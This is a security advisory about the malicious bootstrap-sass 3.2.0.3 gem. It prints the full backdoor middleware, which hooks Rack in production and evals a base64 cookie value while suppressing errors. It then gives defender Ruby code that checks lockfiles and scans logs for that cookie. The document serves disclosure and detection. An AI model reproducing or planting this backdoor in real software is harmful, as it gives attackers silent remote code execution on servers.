Malicious Package Affecting bootstrap-sass package, versions >=3.2.0.3, <3.2.0.4


Severity

critical (Snyk recommended CVSS score 9.8)

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Mature
    EPSS
    44.03% (98th percentile)

  • Snyk ID SNYK-RUBY-BOOTSTRAPSASS-174093
  • published 3 Apr 2019
  • disclosed 26 Mar 2019
  • credit Derek Barnes

How to fix?

Avoid using the malicious versions of bootstrap-sass (>=3.2.0.3, <3.2.0.4).

Overview

bootstrap-sass is a Sass-powered version of Bootstrap 3, ready to drop right into your Sass-powered applications.

Affected versions of this package are malicious. The file lib/active-controller/middleware.rb contains a backdoor which will enable a remote attacker to run arbitrary code on the server by decoding a specific cookie value and evaluating its content.

Details

When bootstrap-sass is required, it also loads the following malicious middleware code, which resides at lib/active-controller/middleware.rb:

begin
  require 'rack/sendfile'
  if Rails.env.production?
    Rack::Sendfile.tap do |r|
      # Keep the original #call reachable as #c, then replace #call with the hook
      r.send :alias_method, :c, :call
      r.send(:define_method, :call) do |e|
        begin
          # Read the ___cfduid cookie from HTTP_COOKIE, base64-decode it and eval the result
          x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)
          eval(x) if x
        rescue Exception
          # Every error is swallowed so the hook never shows up in application logs
        end
        c(e)  # hand the request on to the real Rack::Sendfile#call
      end
    end
  end
rescue Exception
  nil  # failures while installing the hook are silently ignored as well
end
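The two defender-side checks that follow from the description above, as an added example that is not part of the advisory or of the bootstrap-sass project: a lockfile check against the advisory's affected range, and a request-log check that decodes the same ___cfduid cookie the backdoor reads (note the three underscores; Cloudflare's legitimate cookie was __cfduid with two) without evaluating it. The Gemfile.lock excerpt, the log line format (`<ip> <path> cookie=<Cookie header>`) and all log lines are constructed sample input.

```ruby
require 'base64'
require 'rubygems'

# Affected range taken from the advisory: >=3.2.0.3, <3.2.0.4
AFFECTED = Gem::Requirement.new('>= 3.2.0.3', '< 3.2.0.4')

# Return the bootstrap-sass versions pinned in a Gemfile.lock that fall in the
# affected range. Takes the lockfile text so it runs offline on any input.
def affected_bootstrap_sass_versions(lockfile_text)
  lockfile_text.scan(/^\s*bootstrap-sass \(([\d.]+)\)/).flatten.uniq.select do |v|
    AFFECTED.satisfied_by?(Gem::Version.new(v))
  end
end

# Extract and urlsafe-base64-decode the ___cfduid cookie exactly as the backdoor
# would see it, but never evaluate it. Returns nil when absent or not decodable.
# (The backdoor's own regex also insists on a trailing ';'; this is a superset.)
def backdoor_cookie_payload(cookie_header)
  m = cookie_header.to_s.match(/___cfduid=([^;\s]+)/)
  return nil unless m
  Base64.urlsafe_decode64(m[1])
rescue ArgumentError
  nil  # not valid base64, so the backdoor's eval would never have received it
end

# A cookie with this name that decodes cleanly is worth an alert on its own:
# no legitimate session or CDN cookie uses the three-underscore name.
def suspicious_cookie?(cookie_header)
  !backdoor_cookie_payload(cookie_header).nil?
end

# Scan constructed log lines of the form "<ip> <path> cookie=<Cookie header>".
def scan_log(lines)
  lines.filter_map do |line|
    ip, path, cookie = line.match(/^(\S+) (\S+) cookie=(.*)$/)&.captures
    next unless cookie && suspicious_cookie?(cookie)
    { ip: ip, path: path, decoded_bytes: backdoor_cookie_payload(cookie).bytesize }
  end
end

# Constructed Gemfile.lock excerpt pinning the malicious release.
SAMPLE_LOCKFILE = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      bootstrap-sass (3.2.0.3)
        autoprefixer-rails (>= 5.2.1)
        sassc (>= 2.0.0)
      sassc (2.0.1)
LOCK

# Constructed log lines: a normal request, one carrying a decodable ___cfduid
# cookie (payload is a harmless marker string), and one that is not base64.
SAMPLE_LOG = [
  "10.0.0.5 /login cookie=_session_id=abc123; __cfduid=d41d8cd98f00b204",
  "10.0.0.9 /assets/app.css cookie=___cfduid=#{Base64.urlsafe_encode64('constructed test payload')};",
  "10.0.0.7 / cookie=___cfduid=not*base64*;",
]

if __FILE__ == $0
  p affected_bootstrap_sass_versions(SAMPLE_LOCKFILE)  # => ["3.2.0.3"]
  p scan_log(SAMPLE_LOG)                                # => one hit from 10.0.0.9
end
```

Pointing `scan_log` at real access logs requires that the Cookie header is logged at all, which most default formats omit; the lockfile check needs nothing beyond the repository and is the one to run first.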

CVSS Scores

CVSS version 3.1

Snyk (recommended): 9.8 critical
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    High
  • Integrity (I)
    High
  • Availability (A)
    High